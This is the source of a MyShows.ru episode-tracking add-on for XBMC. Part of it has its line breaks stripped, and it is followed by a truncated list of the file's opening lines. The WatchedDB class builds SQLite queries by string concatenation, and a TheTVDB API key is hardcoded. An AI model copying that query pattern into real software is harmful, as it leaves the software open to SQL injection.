__language__(30319)+'|:|'+sys_url+'6', __language__(30315)+'|:|'+sys_url+'5', __language__(30310)+'|:|'+sys_url+'201', __language__(30318)+'|:|'+sys_url+'71', __language__(30228)+'|:|'+sys_url+'7', __language__(30314)+'|:|'+sys_url+'8',] elif mode==40: menu=[__language__(30300)+'|:|'+sys_url+'0&action=watching'+refresh_url, __language__(30301)+'|:|'+sys_url+'0&action=later'+refresh_url, __language__(30302)+'|:|'+sys_url+'0&action=cancelled'+refresh_url, __language__(30319)+'|:|'+sys_url+'6'] elif mode==25 or not sort and mode in (27,28): menu=[__language__(30227)+'|:|'+sys_url+'4', __language__(30305)+'|:|'+sys_url+'0&action=check'+refresh_url, __language__(30306)+'|:|'+sys_url+'0&action=uncheck'+refresh_url, __language__(30317)+'|:|'+sys_url+'2', __language__(30319)+'|:|'+sys_url+'6', __language__(30308)+'|:|'+sys_url+'1'+refresh_url, __language__(30318)+'|:|'+sys_url+'71', __language__(30310)+'|:|'+sys_url+'201', __language__(30228)+'|:|'+sys_url+'200',] elif mode in (50,) and not sort: menu=[__language__(30227)+'|:|'+sys_url, __language__(30310)+'|:|'+sys_url+'1', __language__(30311)+'|:|'+sys_url+'2', __language__(30318)+'|:|'+sys_url+'71', __language__(30228)+'|:|'+sys_url+'0'] elif mode==50 and sort: menu=[__language__(30314)+'|:|'+sys_url+'0'] elif mode in (51,): menu=[] if ifstat==True: menu.append(__language__(30312)+'|:|'+sys_url+'02') elif ifstat==False: menu.append(__language__(30313)+'|:|'+sys_url+'01') menu.extend([__language__(30227)+'|:|'+sys_url, __language__(30311)+'|:|'+sys_url+'2', __language__(30318)+'|:|'+sys_url+'71', __language__(30228)+'|:|'+sys_url+'0']) for s in menu: myshows_dict.append([s.split('|:|')[0],'XBMC.RunPlugin('+s.split('|:|')[1]+')']) return myshows_dict class SyncXBMC(): def __init__(self, inner=None, rating=None): self.menu,self.rating,self.title=None,None,title self.useTVDB=useTVDB if not inner: self.action=action else: self.action='check' self.title=str(inner) self.rating=rating self.jloadshows=Data(cookie_auth, 'http://api.myshows.ru/profile/shows/').get() if self.jloadshows: self.jdatashows = json.loads(self.jloadshows) else: return if self.action in ['check']: self.match=json.loads(self.title) if self.useTVDB: from search.scrapers import Scrapers self.TVDB=Scrapers() else: self.menu=self.GetFromXBMC() def doaction_simple(self): id=None showId=None if self.match and 'showtitle' in self.match: showId=self.showtitle2showId() if self.match and 'date' in self.match and not 'episode' in self.match: id, self.match['season'],self.match['episode']=date2SE(showId, self.match['date']) if showId: if 'season' in self.match and 'episode' in self.match: Debug('[doaction] Getting the id of S%sE%s' % (str(self.match['season']),str(self.match['episode']))) id=self.getid(showId, self.match['season'],self.match['episode'],self.match['label']) Debug('[doaction][showId]: '+str(showId)+' [doaction][id]: '+str(id)) return showId, id def doaction(self): friend_xbmc() if self.action=='check': if 'myshows_id' in self.match: showId, id=self.match['myshows_showId'],self.match['myshows_id'] else: showId, id=self.doaction_simple() if __settings__.getSetting("label")=='true' and not id: if 'file' in self.match: self.match['label']=self.match['file'] idlist=[] if 'label' in self.match and re.search('.*?\.avi|mp4|mkv|flv|mov|vob|wmv|ogm|asx|mpg|mpeg|avc|vp3|fli|flc|m4v$', self.match['label'], re.I | re.DOTALL): self.match['label']=self.match['label'].replace(os.path.dirname(self.match['label']),'').encode('utf-8','ignore').lstrip('\\/') self.old_match=self.match self.match=filename2match(self.match['label']) showId, id=self.doaction_simple() if not id: Debug('[doaction] Trying to find filename on myshows.ru: '+self.old_match['label']) data=Data(cookie_auth, 'http://api.myshows.ru/shows/search/file/?q='+urllib.quote_plus(self.old_match['label'])).get() if data: jdata=json.loads(data) showId=jdata['show']['id'] ids=jdata['show']['episodes'] for x in ids: idlist.append(x) if len(idlist)==1: id=idlist[0] #Debug('[doaction] [filename2match] '+unicode(self.match)) if showId or id: if not id and 'season' in self.match and 'episode' in self.match: Debug('[doaction2] Getting the id of S%sE%s' % (str(self.match['season']),str(self.match['episode']))) id=self.getid(showId, self.match['season'],self.match['episode'],self.match['label']) if id: if self.rating: rate_url=('http://api.myshows.ru/profile/episodes/rate/'+str(self.rating)+'/'+str(id)) d=Data(cookie_auth, rate_url, 'http://api.myshows.ru/profile/shows/'+str(showId)+'/').get() #Debug('[TEST][self.rating]: Rate answer %s' % (str(d))) if self.rating or self.rating==0: #xbmc.sleep(500) status_url='http://api.myshows.ru/profile/episodes/check/'+str(id) c=Data(cookie_auth, status_url, 'http://api.myshows.ru/profile/shows/'+str(showId)+'/').get() #Debug('[TEST][self.rating]: Check answer %s' % (str(c))) return 1 rateOK, scrobrate, rateandcheck=False, __settings__.getSetting("scrobrate"), __settings__.getSetting("rateandcheck") if scrobrate=='true': #Debug('[TEST][doaction]: Start rateOK') rateOK=Rate(str(showId), str(id), 'http://api.myshows.ru/profile/shows/'+str(showId)+'/', self.title) #Debug('[TEST][doaction]: rateOK '+str(rateOK)) else: rateOK=True if rateOK or rateandcheck=='false': if str(showId) not in self.jdatashows or self.jdatashows[str(showId)]['watchStatus']!='watching': #Debug('[doaction]: New show! Marking as watching') Change_Status_Show(str(showId), 'watching', 'http://api.myshows.ru/profile/shows/') xbmc.sleep(500) #Debug('[TEST][doaction]: Start Change_Status_Episode') #xbmc.sleep(500) Change_Status_Episode(showId, id, action, '0', 'http://api.myshows.ru/profile/shows/'+str(showId)+'/', self.title) def showtitle2showId(self): try:showtitle=self.match['showtitle'].decode('utf-8','ignore') except:showtitle=self.match['showtitle'] if 'tvdb_id' in self.match: tvdb_id=self.match['tvdb_id'] else: tvdb_id=None for showId in self.jdatashows: if showtitle==self.jdatashows[showId]['ruTitle'] or showtitle==self.jdatashows[showId]['title']: return int(showId) Debug('[showtitle2showId] '+unicode(showtitle)) jload=Data(cookie_auth, 'http://api.myshows.ru/shows/search/?q=%s' % urllib.quote_plus(showtitle.encode('utf-8', 'ignore'))).get() if jload: jdata = json.loads(jload) Debug('[showtitle2showId] Search '+unicode(jload)) else: if tvdb_id: html=get_html_source("http://thetvdb.com/api/33DBB309BB2B0ADB/series/%s/en.xml" % tvdb_id) if re.findall('<SeriesName>(.+?)</SeriesName>', html, re.DOTALL)[0]: showtitle=re.findall('<SeriesName>(.+?)</SeriesName>', html, re.DOTALL)[0] Debug('[showtitle2showId] After [tvdb_id] '+showtitle) jload=Data(cookie_auth, 'http://api.myshows.ru/shows/search/?q=%s' % urllib.quote_plus(showtitle.encode('utf-8', 'ignore'))).get() if jload: jdata = json.loads(jload) else: return select_show=[] showIds=[] for showId in jdata: select_show.append((jdata[showId]['title'], showId, int(jdata[showId]['watching']))) if unicode(showtitle).lower()==unicode(jdata[showId]['ruTitle']).lower() or unicode(showtitle).lower()==unicode(jdata[showId]['title']).lower(): showIds.append(showId) theshowId=showId if len(showIds)==1: return int(theshowId) select_show=sorted(select_show, key=lambda x: x[2], reverse=True) showtitles=[] showIds=[] showId=None for x in select_show: showtitles.append(x[0]) showIds.append(x[1]) if len(showIds)==1: showId=int(showIds[0]) else: dialog = xbmcgui.Dialog() ret = dialog.select(unicode(__language__(30289)), showtitles) if ret!=-1: showId=int(showIds[ret]) if showId: return showId def getid(self, showId, seasonNumber, episodeId, lable=None): data= Data(cookie_auth, 'http://api.myshows.ru/shows/'+str(showId)).get() jdata = json.loads(data) if seasonNumber and int(seasonNumber)>0 and episodeId: for id in jdata['episodes']: if jdata['episodes'][id]['seasonNumber']==int(seasonNumber) and jdata['episodes'][id]['episodeNumber']==int(episodeId): return int(id) episodes=[] for id in jdata['episodes']: episodes.append((id, jdata['episodes'][id]['title'], jdata['episodes'][id]['seasonNumber'])) if lable and jdata['episodes'][id]['title']==lable: return int(id) if len(episodes)==1: return int(episodes) episodes=sorted(episodes, key=lambda x: x[0], reverse=True) eptitles=[] ids=[] for x in episodes: eptitles.append('S'+int_xx(x[2])+' '+x[1]) ids.append(x[0]) dialog = xbmcgui.Dialog() ret = dialog.select(unicode(__language__(30289)), eptitles) if ret!=-1: return int(ids[ret]) def get_menu(self): if self.menu: return self.menu else: return self.GetFromXBMC() def list(self): self.menu=self.get_menu() for i in self.menu: item = xbmcgui.ListItem(i['title'], iconImage='DefaultFolder.png', thumbnailImage=i['thumbnail']) item=self.shows(i['title'],item) xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url='', listitem=item, isFolder=True) def shows(self, title, item, info=None, avatar=False): if not self.menu and not self.useTVDB: return item if self.useTVDB: #Debug('[shows][useTVDB]:'+info['tvshowtitle']) #Debug('[shows][useTVDB]:'+info['title']) try:info['title']=info['title'].decode('utf-8','ignore') except:pass try:info['tvshowtitle']=info['tvshowtitle'].decode('utf-8','ignore') except:pass meta=self.TVDB.scraper('tvdb', {'label':info['title'], 'search':[info['tvshowtitle'],info['title']], 'year':info['year']}) if not meta: return item item=self.itemTVDB(item,meta,avatar) try: #if 1==1: #print str(meta) if 'title' in info: meta['info']['title']=info['title'] if 'rating' in info: meta['info']['rating']=info['rating'] if 'votes' in info: meta['info']['votes']=info['votes'] if 'plot' in info: meta['info']['plot']=meta['info']['plot'].replace('&quot;','"')+'\r\n'+info['plot'] elif 'plot' in meta['info'] and meta['info']['plot']: meta['info']['plot']=meta['info']['plot'].replace('&quot;','"') if 'playcount' in info: meta['info']['playcount']=info['playcount'] if 'episode' in info: meta['info']['episode']=info['episode'] #print str(meta) except:pass item.setInfo(type='Video', infoLabels=meta['info'] ) return item self.menu=self.get_menu() for i in range(len(self.menu)): try: if title in self.menu[i]['title']: item.setProperty('fanart_image', self.menu[i]['fanart']) for studio_info in self.menu[i]['studio']: try: studio+=', '+studio_info except: studio=studio_info self.menu[i]['studio']=studio.encode('utf-8') for genre_info in self.menu[i]['genre']: try: genre+=', '+genre_info except: genre=genre_info self.menu[i]['genre']=genre.encode('utf-8') if info: self.menu[i]['title']=info['title'] self.menu[i]['playcount']=0 self.menu[i]['plot']=info['plot']+self.menu[i]['plot'] break except:pass try: item.setInfo( type='Video', infoLabels=self.menu[i] ) except: item.setInfo( type='Video', infoLabels=info) return item def episodes_meta(self, info): meta=self.TVDB.scraper('tvdb', {'label':info['label'], 'search':info['label'], 'year':str(info['year'])}) if not meta: return banners=self.TVDB.scraper('tvdb', {'label':info['label'], 'search':info['label'], 'year':str(info['year']), 'season':True}) return meta, banners def episodes(self, title, item, info, meta=None): if not self.menu and not self.useTVDB: return item if self.useTVDB and meta: item=self.itemTVDB(item,meta) try: #if 1==1: #print str(meta) meta['info']['title']=info['title'] meta['info']['rating']=info['rating'] meta['info']['votes']=info['votes'] if 'playcount' in info: meta['info']['playcount']=info['playcount'] if 'plot' in info and info['plot']: meta['info']['plot']=info['plot'] except:pass item.setInfo(type='Video', infoLabels=meta['info'] ) return item self.menu=self.get_menu() for i in range(len(self.menu)): if title in self.menu[i]['title']: #Debug('episodes:'+title+' '+str(self.menu[i]['title'])) item.setProperty('fanart_image', self.menu[i]['fanart']) break item.setInfo( type='Video', infoLabels=info ) return item def episode(self, title, seasonId, episodeNumber): self.menu=self.get_menu() if not self.menu: return False for i in range(len(self.menu)): if title in self.menu[i]['title']: for episode in self.menu[i]['episodes']: if episode['episode']==episodeNumber and episode['season']==seasonId: return True return False def episode_fanart(self, info): if self.useTVDB: meta=self.TVDB.scraper('tvdb', {'label':info['label'], 'search':info['label'], 'year':str(info['year'])}) if not meta: return '' else: return meta['properties']['fanart_image'] self.menu=self.get_menu() if not self.menu: return '' for i in range(len(self.menu)): try: if info['title'] in self.menu[i]['title']: return self.menu[i]['fanart'] except:pass return '' def GetFromXBMC(self): from utilities import xbmcJsonRequest Debug('[Episodes Sync] Getting episodes from XBMC') shows = xbmcJsonRequest({'jsonrpc': '2.0', 'method': 'VideoLibrary.GetTVShows', 'params': {'properties': ['title', 'originaltitle', 'genre', 'year', 'rating', 'plot', 'studio', 'mpaa', 'cast', 'imdbnumber', 'premiered', 'votes', 'fanart', 'thumbnail', 'episodeguide', 'playcount', 'season', 'episode', 'tag']}, 'id': 0}) # sanity check, test for empty result if not shows: Debug('[Episodes Sync] xbmc json request was empty.') return # test to see if tvshows key exists in xbmc json request if 'tvshows' in shows: shows = shows['tvshows'] #Debug("[Episodes Sync] XBMC JSON Result: '%s'" % str(shows)) else: Debug("[Episodes Sync] Key 'tvshows' not found") return for show in shows: show['episodes'] = [] episodes = xbmcJsonRequest({'jsonrpc': '2.0', 'method': 'VideoLibrary.GetEpisodes', 'params': {'tvshowid': show['tvshowid'], 'properties': ['season', 'episode', 'playcount', 'uniqueid', 'file']}, 'id': 0}) if 'episodes' in episodes: episodes = episodes['episodes'] show['episodes'] = [x for x in episodes if type(x) == type(dict())] self.xbmc_shows = [x for x in shows if x['episodes']] return shows def itemTVDB(self, item, kwarg, avatar=False): #Debug('[itemTVDB]:meta '+str(kwarg)) if 'title' in kwarg and kwarg['title']: item.setLabel(kwarg['title']) if 'label' in kwarg and kwarg['label']: item.setLabel2(kwarg['label']) if not avatar and 'icon' in kwarg and kwarg['icon']: item.setIconImage(kwarg['icon']) if not avatar and 'thumbnail' in kwarg and kwarg['thumbnail']: item.setThumbnailImage(kwarg['thumbnail']) if 'properties' in kwarg and kwarg['properties']: for key, value in kwarg['properties'].iteritems(): item.setProperty(key, str(value)) return item class WatchedDB: def __init__(self): dirname = xbmc.translatePath('special://temp') for subdir in ('xbmcup', sys.argv[0].replace('plugin://', '').replace('/', '')): dirname = os.path.join(dirname, subdir) if not xbmcvfs.exists(dirname): xbmcvfs.mkdir(dirname) self.dbfilename = os.path.join(dirname, 'data.db3') if not xbmcvfs.exists(self.dbfilename): creat_db(self.dbfilename) self.dialog = xbmcgui.Dialog() def _get(self, id): self._connect() Debug('[WatchedDB][_get]: Checking '+id) id=id.replace("'","<&amp>").decode('utf-8','ignore') self.where=" where id='%s'" % (id) #if 1==1: try: self.cur.execute('select rating from watched'+self.where) except: #else: self.cur.execute('create table watched(addtime integer, rating integer, id varchar(32) PRIMARY KEY)') self.cur.execute('select rating from watched'+self.where) res=self.cur.fetchone() self._close() return res[0] if res else None def _get_all(self): self._connect() self.cur.execute('select id, rating from watched order by addtime desc') res = [[unicode(x[0]).replace("<&amp>","'").encode('utf-8','ignore'),x[1]] for x in self.cur.fetchall()] self._close() return res def check(self, id, rating=0): ok1,ok3=None,None db_rating=self._get(id) title=titlesync(id) if getSettingAsBool("silentoffline"): if db_rating==None and rating>=0: showMessage(__language__(30520),__language__(30522) % (str(rating))) ok1=True elif db_rating>=0 and rating!=db_rating: showMessage(__language__(30520),__language__(30523) % (str(rating))) ok3=True elif db_rating!=None and rating==db_rating: showMessage(__language__(30520),__language__(30524) % (str(rating))) else: if db_rating==None and rating>=0: ok1=self.dialog.yesno(__language__(30520),__language__(30525) % (str(rating)), str(title)) elif db_rating and rating!=db_rating: ok3=self.dialog.yesno(__language__(30520),__language__(30526) % (str(db_rating), str(rating)),str(title)) elif db_rating==0 and rating!=db_rating: ok3=True elif db_rating!=None and rating==db_rating: showMessage(__language__(30520),__language__(30527) % (str(rating))) Debug('[WatchedDB][check]: rating: %s DB: %s, ok1: %s, ok3: %s' % (str(rating), str(db_rating), str(ok1), str(ok3))) if ok1: self._add(id, rating) return True if ok3: self._delete(id) self._add(id, rating) return True def onaccess(self): #Debug('[WatchedDB][onaccess]: Start') self._connect() self.cur.execute('select count(id) from watched') x=self.cur.fetchone() res=int(x[0]) self._close() i=0 if res>0: #Debug('[WatchedDB][onaccess]: Found %s' % (str(res))) silentofflinesend=getSettingAsBool('silentofflinesend') if not silentofflinesend: ok2=self.dialog.yesno(__language__(30521),__language__(30528) % (str(res)), __language__(30529)) else: ok2=True if ok2: for id,rating in self._get_all(): j=SyncXBMC(id,int(rating)).doaction() i=i+int(j) self._delete(id) showMessage(__language__(30521),__language__(30530) % (i)) else: ok2=self.dialog.yesno(__language__(30521),__language__(30531) % (str(res))) if ok2: for id,rating in self._get_all(): self._delete(id) return res def _add(self, id, rating=0): self._connect() id=id.replace("'","<&amp>").decode('utf-8','ignore') Debug('[WatchedDB][_add]: Adding %s with rate %d' % (id, rating)) self.cur.execute('insert into watched(addtime, rating, id) values(?,?,?)', (int(time.time()), int(rating), id)) self.db.commit() self._close() def _delete(self, id): self._connect() id=id.replace("'","<&amp>").decode('utf-8','ignore') self.cur.execute("delete from watched where id=('"+id+"')") self.db.commit() self._close() def _connect(self): self.db = sqlite.connect(self.dbfilename) self.cur = self.db.cursor() def _close(self): self.cur.close() self.db.close() def Test(): #SyncXBMC() #RunPlugin='{"mode": "60", "argv": {"content": "videos"}}' #xbmc.executebuiltin('XBMC.RunPlugin('+sys.argv[0]+'?'+urllib.quote_plus(RunPlugin)+')') #print Rate('9237', '2031031', 'http://api.myshows.ru/profile/shows/9237/', True) #PluginStatus().use('myshows') ''' import libtorrent for filename in xbmcvfs.listdir(r'D:\torrents')[1]: filelist=[] tor=os.path.join('D:\\','torrents',filename) torrentFileInfo = libtorrent.torrent_info(tor) s=torrentFileInfo.files() for f in s: if '\\' not in f.path[f.path.find('\\')+1:]: filelist.append(f.path[f.path.find('\\')+1:]) print 'filelist.append('+str(filelist)+')' pass''' #data={'item': {'label': u'\u041a\u043b\u043e\u0434 \u0432 \u043f\u043e\u043c\u043e\u0449\u044c (2012)'}} #file=data['item']["label"] #file=file.replace('.',' ').replace('_',' ').replace('[',' ').replace(']',' ').replace('(',' ').replace(')',' ').strip() #match=re.compile('(.+) (\d{4})( |$)', re.I | re.IGNORECASE).findall(file) #if match: # data["title"], data["year"] = match[0][0],match[0][1] # data["type"] = "movie" # data["year"]=int(data["year"]) # data["title"]=data["title"].strip() # kinorate(data['title'],data['year']) #data={"year": "2013", "titleAlt": "\u041f\u0440\u043e\u043a\u043b\u044f\u0442\u0438\u0435 \u043c\u0443\u043b\u044c\u0442\u0438\u0432\u044b\u0431\u043e\u0440\u0430 \u043f\u0440\u0435\u0432\u0440\u0430\u0442\u0438\u043b\u043e \u043c\u043e\u044e \u0436\u0438\u0437\u043d\u044c \u0432 \u0430\u0434", "title": "Ore no N\u014dnai Sentakushi ga, Gakuen Love Come o Zenryoku de Jama S"} #kinorate(data['title'],data['year'],titleAlt=data['titleAlt']) #kinorate('Мальчишник Часть 3',2013) #RateShow(24199).count() #Rate('24199', '0',None) #title='{"tvshowid": 35, "episode": 9, "season": 1, "tvdb_id": "79044", "episodeid": 964, "label": "That Brooch Was So Heavy", "uniqueid": {"unknown": "305749"}, "year": 2005, "showtitle": "Honey and Clover"}' #title='{"tvshowid": 35, "episode": 9, "season": 1, "tvdb_id": "79044", "episodeid": 964, "label": "That Brooch Was So Heavy", "uniqueid": {"unknown": "305749"}, "year": 2005, "showtitle": "Интерны"}' title='{"tvshowid": 51, "episode": 10, "uniqueid": {"unknown": "4606529"}, "season": 1, "tvdb_id": "269877", "episodeid": 1204, "label": "The Best of the Student Council (Photos)", "file": "smb://192.168.0.2/xbmc_seriez/Love Lab/Season 1/Love.Lab.S01E10.mkv", "year": 2013, "showtitle": "Love Lab"}' #try: # SyncXBMC(title).doaction() #except ValueError or AttributeError: # FakeRate(title) #FakeRate(title) #WatchedDB().onaccess() folder=u'D:\\seriez\\xxx1и\\' folder=folder.encode('utf-8','ignore') subtitledirs=xbmcvfs.listdir(folder)[0] for d in subtitledirs: for x in xbmcvfs.listdir(folder+os.sep+d)[0]: subtitledirs.append(d+os.sep+x) if len(subtitledirs)>0: subtitledirs.insert(0,__language__(30505)) ret = xbmcgui.Dialog().select(__language__(30506), subtitledirs) params = get_params() try: apps=get_apps() except: pass showId = None title = None mode = None seasonNumber = None id = None action = None playcount = None sort = None episodeId = None refresh_url = None stringdata = None try: title = urllib.unquote_plus(params['title']) except: pass try: showId = urllib.unquote_plus(params['showId']) except: pass try: seasonNumber = urllib.unquote_plus(params['seasonNumber']) except: pass try: mode = int(params['mode']) except: pass try: mode = int(apps['mode']) except: pass try: id = urllib.unquote_plus(str(params['id'])) except: pass try: episodeId = urllib.unquote_plus(str(params['episodeId'])) except: pass try: playcount = str(params['playcount']) except: pass try: action = urllib.unquote_plus(params['action']) except: pass try: sort = str(params['sort']) except: pass try: refresh_url = urllib.unquote_plus(params['refresh_url']) except: pass try: stringdata = urllib.unquote_plus(params['stringdata']) except: pass try: title = urllib.unquote_plus(apps['title']) except: pass try: showId = str(urllib.unquote_plus(apps['argv']['showId'])) except: pass try: seasonNumber = str(urllib.unquote_plus(apps['argv']['seasonNumber'])) except: pass try: mode = int(apps['mode']) except: pass try: id = urllib.unquote_plus(str(apps['argv']['id'])) except: pass try: episodeId = urllib.unquote_plus(str(apps['argv']['episodeId'])) except: pass try: playcount = str(apps['argv']['playcount']) except: pass try: action = urllib.unquote_plus(apps['argv']['action']) except: pass try: sort = str(apps['argv']['sort']) except: pass try: refresh_url = urllib.unquote_plus(apps['argv']['refresh_url']) except: pass try: stringdata = urllib.unquote_plus(apps['argv']['stringdata']) except: pass if mode == None: Main() elif mode==1: import shutil ru=os.path.join(__addonpath__, u'resources',u'language',u'Russian') en=os.path.join(__addonpath__, u'resources',u'language',u'English') shutil.move(os.path.join(en, u'strings.xml'), os.path.join(en, u'old_strings.xml')) shutil.copy(os.path.join(ru, u'strings.xml'), en) showMessage(__language__(30208), __language__(30533)) elif mode >= 10 and mode <19: Shows() xbmcplugin.addSortMethod(handle=int(sys.argv[1]), sortMethod=xbmcplugin.SORT_METHOD_VIDEO_TITLE) elif mode == 19: Shows() xbmcplugin.addSortMethod(handle=int(sys.argv[1]), sortMethod=xbmcplugin.SORT_METHOD_VIDEO_RATING) elif mode == 20: Seasons(showId) elif mode == 25: Episodes(showId, seasonNumber) xbmcplugin.addSortMethod(handle=int(sys.argv[1]), sortMethod=xbmcplugin.SORT_METHOD_EPISODE) elif mode == 27: xbmcplugin.addSortMethod(handle=int(sys.argv[1]), sortMethod=xbmcplugin.SORT_METHOD_DATE) if not sort: EpisodeList('unwatched') else: ShowList('unwatched') elif mode == 28: xbmcplugin.addSortMethod(handle=int(sys.argv[1]), sortMethod=xbmcplugin.SORT_METHOD_DATE) if not sort: EpisodeList('next') else: ShowList('next') elif mode == 30: EpisodeMenu(id, playcount, refresh_url) elif mode == 40: FriendsNews() elif mode == 41: if action==None: action=login if sort==None: sort='profile' Profile(action, sort) elif mode == 50: MyTorrents() elif mode == 51: MyScanList() elif mode == 52: uTorrentBrowser() elif mode == 60: ClearCache() elif mode == 61: PluginStatus().menu() elif mode == 62: ExtraFunction() elif mode == 70: #if 1==0: try: SyncXBMC(title).doaction() Debug('[mode 70]: SyncXBMC(title).doaction() success') except ValueError or AttributeError: Debug('[mode 70]: ValueError or AttributeError, start FakeRate for %s' % (title)) if action=='check': FakeRate(title) elif mode == 71: try: get_data= get_url(cookie_auth, 'http://api.myshows.ru/profile/news/') WatchedDB().onaccess() except: showMessage(__language__(30520),__language__(30532)) elif mode in (2571,5171,302071,3071): MoveToXBMC() elif mode == 610: PluginStatus().install(action) elif mode == 611: PluginStatus().install_plugin(action) elif mode == 100: if not action: action='all' TopShows(action) elif mode == 200: Change_Status_Show(showId, action, refresh_url) elif mode in (206,256,306): xbmc.executebuiltin("Action(Info)") elif mode == 250: Change_Status_Season(showId, seasonNumber, action, refresh_url) elif mode in (251,201,302): Rate(showId, id, refresh_url) elif mode == 300: Change_Status_Episode(showId, id, action, playcount, refresh_url) elif mode == 3000 or mode == 2500: VKSearch(showId, id) elif mode == 3010: Source().addsource() jdata=get_apps(stringdata) #Debug('[Input]'+str((jdata,action,sort))) if not sort:AskPlay() elif sort=='activate': if action!='silent': gotoCheckPoint() if action=='download' or action=='silent': DownloadSource() elif not jdata['id']: ScanSource().scanone() elif mode == 3011: Source().addjson() elif mode == 3012: Serialu().add() elif mode == 3013: gotoCheckPoint() elif mode == 3020: PlayFile() elif mode == 3090: AskPlay() elif mode == 301 or mode == 252: Favorite(id, refresh_url) elif mode in (500,258): DeleteSourses() elif mode == 510: ScanAll() elif mode in (30202,259): ScanSource().scanone() elif mode == 302001: ScanSource().add() elif mode == 302002: ScanSource().delete() elif mode in (30200,257): DeleteSource() elif mode in (30201,25201): DownloadSource(stringdata) elif mode == 303 or mode==203 or mode==253: AddSource() elif mode == 304 or mode==204 or mode==254: PlaySource() elif mode in (205,255): ontop('update', stringdata) elif mode == 999: Test() xbmcplugin.endOfDirectory(int(sys.argv[1]))
[ "# -*- coding: utf-8 -*-\n", "\n", "import urllib, re, sys, socket, json, os\n", "import xbmcplugin, xbmcgui, xbmc, xbmcaddon, xbmcvfs\n", "\n", "from functions import *\n", "from torrents import *\n", "from app import Handler, Link\n", "from rating import *\n", "\n", "__version__ = \"1.8.9\"\n", "__plugin__ = \"MyShows.ru \" + __version__\n", "__author__ = \"DiMartino\"\n", "__settings__ = xbmcaddon.Addon(id='plugin.video.myshows')\n", "__language__ = __settings__.getLocalizedString\n", "login=__settings__.getSetting(\"username\")\n", "ruName=__settings__.getSetting(\"ruName\")\n", "change_onclick=__settings__.getSetting(\"change_onclick\")\n", "cookie_auth=__settings__.getSetting(\"cookie_auth\")\n", "useTVDB=getSettingAsBool('tvdb')\n", "socket.setdefaulttimeout(30)\n", "__addonpath__= __settings__.getAddonInfo('path')\n", "icon = __addonpath__+'/icon.png'\n", "__tmppath__= os.path.join(__addonpath__, 'tmp')\n", "forced_refresh_data=__settings__.getSetting(\"forced_refresh_data\")\n", "refresh_period=int('1|4|12|24'.split('|')[int(__settings__.getSetting(\"refresh_period\"))])\n", "refresh_always=__settings__.getSetting(\"refresh_always\")\n", "striplist=['the', 'tonight', 'show', 'with', '(2005)', '(2009)', '(2012)', ' ', ' ', ' ', ' ', ' ', ' ', ' ']\n", "Debug('[SYS ARGV]: '+str(urllib.unquote_plus(sys.argv[2]))[1:])\n", "\n", "check_login = re.search('='+login+';', cookie_auth)\n", "if not check_login:\n", " cookie_auth=auth()\n", "\n", "class Main(Handler):\n", " def __init__(self):\n", " self.menu=[]\n", " menu_style=__settings__.getSetting(\"menu_style\")\n", " top=ontop()\n", " if top: self.menu.append(top)\n", " if menu_style=='1':\n", " self.menu.extend([{\"title\":__language__(30111),\"mode\":\"41\"},{\"title\":__language__(30100),\"mode\":\"10\"},\n", " {\"title\":__language__(30102),\"mode\":\"17\"},{\"title\":__language__(30150),\"mode\":\"18\"},\n", " {\"title\":__language__(30103),\"mode\":\"14\"},{\"title\":__language__(30104),\"mode\":\"15\"},\n", " {\"title\":__language__(30105),\"mode\":\"16\"},{\"title\":__language__(30106),\"mode\":\"27\"},\n", " {\"title\":__language__(30107),\"mode\":\"28\"}, {\"title\":__language__(30108),\"mode\":\"100\"},\n", " {\"title\":__language__(30112),\"mode\":\"40\"}, {\"title\":__language__(30101),\"mode\":\"19\"},\n", " {\"title\":__language__(30149),\"mode\":\"62\"},])\n", " else:\n", " self.menu.extend([{\"title\":__language__(30111),\"mode\":\"41\"},{\"title\":__language__(30139),\"mode\":\"13\"},\n", " {\"title\":__language__(30106),\"mode\":\"27\"},\n", " {\"title\":__language__(30107),\"mode\":\"28\"}, {\"title\":__language__(30108),\"mode\":\"100\"},\n", " {\"title\":__language__(30112),\"mode\":\"40\"}, {\"title\":__language__(30136),\"mode\":\"50\"},\n", " {\"title\":__language__(30137),\"mode\":\"60\"}, {\"title\":__language__(30101),\"mode\":\"19\"},\n", " {\"title\":__language__(30146),\"mode\":\"61\"}, {\"title\":__language__(30141),\"mode\":\"510\"}])\n", " if __settings__.getSetting(\"debug\")=='true':\n", " self.menu.append({\"title\":\"TEST\",\"mode\":\"999\"})\n", " self.handle()\n", " if __settings__.getSetting(\"autoscan\")=='true':\n", " auto_scan()\n", " friend_xbmc()\n", "\n", " def handle(self):\n", " for self.i in self.menu:\n", " try: argv=self.i['argv']\n", " except: argv={'content': 'videos'}\n", " self.item(Link(self.i['mode'], argv), title=unicode(self.i['title']))\n", "\n", "class ExtraFunction(Main):\n", " def __init__(self):\n", " self.menu=[]\n", " self.menu.extend([{\"title\":__language__(30136),\"mode\":\"50\"},\n", " {\"title\":__language__(30137),\"mode\":\"60\"},\n", " {\"title\":__language__(30146),\"mode\":\"61\"},\n", " {\"title\":__language__(30141),\"mode\":\"510\"},\n", " ])\n", " self.handle()\n", "\n", "def Shows():\n", " try: syncshows=SyncXBMC()\n", " except: syncshows=False\n", " saveCheckPoint()\n", " xbmcplugin.setContent(int(sys.argv[1]), 'tvshows')\n", " #lockView('info')\n", " if mode==19:\n", " KB = xbmc.Keyboard()\n", " if action: KB.setDefault(unicode(action))\n", " KB.setHeading(__language__(30203))\n", " KB.doModal()\n", " if (KB.isConfirmed()) and KB.getText() not in [None,'']:\n", " data= Data(cookie_auth, 'http://api.myshows.ru/shows/search/?q='+urllib.quote_plus(KB.getText()))\n", " else:\n", " return\n", " else:\n", " data=Data(cookie_auth, 'http://api.myshows.ru/profile/shows/')\n", "\n", " jload=data.get()\n", " if jload:\n", " jdata = json.loads(jload)\n", " else: return\n", "\n", " #if mode in(11,12):\n", " # next_data=json.loads(Data(cookie_auth, 'http://api.myshows.ru/profile/episodes/next/').get())\n", " #else:\n", " # next_data=[]\n", "\n", " if mode==13:\n", " menu=[{\"title\":TextBB(__language__(30100), 'b'),\"mode\":\"10\", \"argv\":{}},\n", " {\"title\":TextBB(__language__(30102), 'b'),\"mode\":\"17\", \"argv\":{}},\n", " {\"title\":TextBB(__language__(30150), 'b'),\"mode\":\"18\", \"argv\":{}},\n", " {\"title\":TextBB(__language__(30103), 'b'),\"mode\":\"14\", \"argv\":{}},\n", " {\"title\":TextBB(__language__(30104), 'b'),\"mode\":\"15\", \"argv\":{}},\n", " {\"title\":TextBB(__language__(30105), 'b'),\"mode\":\"16\", \"argv\":{}},]\n", " #{\"title\":TextBB('ONGOING', 'b'),\"mode\":\"11\", 